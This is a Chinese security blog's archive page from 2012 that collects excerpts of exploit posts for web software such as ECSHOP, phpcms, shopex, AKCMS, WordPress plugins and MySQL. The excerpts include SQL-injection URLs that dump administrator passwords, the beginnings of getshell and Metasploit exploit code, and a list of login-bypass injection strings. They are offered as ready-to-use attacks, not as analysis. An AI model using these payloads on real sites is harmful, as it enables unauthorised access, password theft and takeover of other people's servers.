本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 漏洞收集

建站之星最新0DAY

2012.12.26 , , No Comments ,

转自:https://www.t00ls.net/thread-21381-1-1.html //code by helen public function save_profile() { $user_info =@ ParamHolder::get('user', array());//获取数组 if (size...

ECSHOP全版本注入0DAY

2012.12.26 , , No Comments ,

把任意商品加入购物车在填写配送地址那一页,有地区选择 flow.php?step=consignee&direct_shopping=1 比如省选择安徽 其中POST数据如下 country=1&province=3&city=37&district=409&consignee=11111&email=11111111%...

WordPress Asset-Manager PHP File Upload Vulnerability

2012.12.26 , , No Comments ,

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more infor...

WordPress WP-Property PHP File Upload Vulnerability

2012.12.26 , , No Comments ,

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more infor...

MySQL(Linux)远程数据库提权漏洞

2012.12.4 , , No Comments ,

漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。   use DBI(); $|=1; =for comment MySQL privilege elevation ...

phpcmsV9 Getshell Exp

2012.10.10 , , No Comments ,

<?php error_reporting(E_ERROR); set_time_limit(0); $pass="wooyun.in"; print_r(' +--------------------------------------------------------------------------...

shopex前台普通用户getshell最新漏洞

2012.09.28 , , No Comments ,

利用方法: 第一个:想办法找到目标网站的绝对路径 http://www.wooyun.in/install/svinfo.php?phpinfo=true http://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php htt...

AKCMS 后台拿Webshell

2012.09.21 , , 1 Comment ,

爆管理员密码: http://www.xxx.com/akcms_keyword.php?sid=11111%27and %28select%201%20from%28select%20count%28*%29,concat%28% 28select%20%28select%20%28select%20concat%280x7e,0×27, password,0×27...

盛大phpcmsv9爆管理密码漏洞

2012.09.13 , , No Comments ,

漏洞形成原因就不多说了 文件在phpcms/api.php 有兴趣的盆友可以多去挖一挖phpcms的洞子 主要利用过程: 第一步:注册一个用户 http://www.i0day.com//index.php?m=member&c=index&a=register&siteid=1 第二步:访问链接爆表前缀 http://www.i0day...

网站万能密码大全[转]

2012.08.9 , , No Comments ,

渗透常用万能密码 最新整理各类网站程序后台万能登陆密码大全: 好多后台默认密码 admin admin admin admin888 asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a ...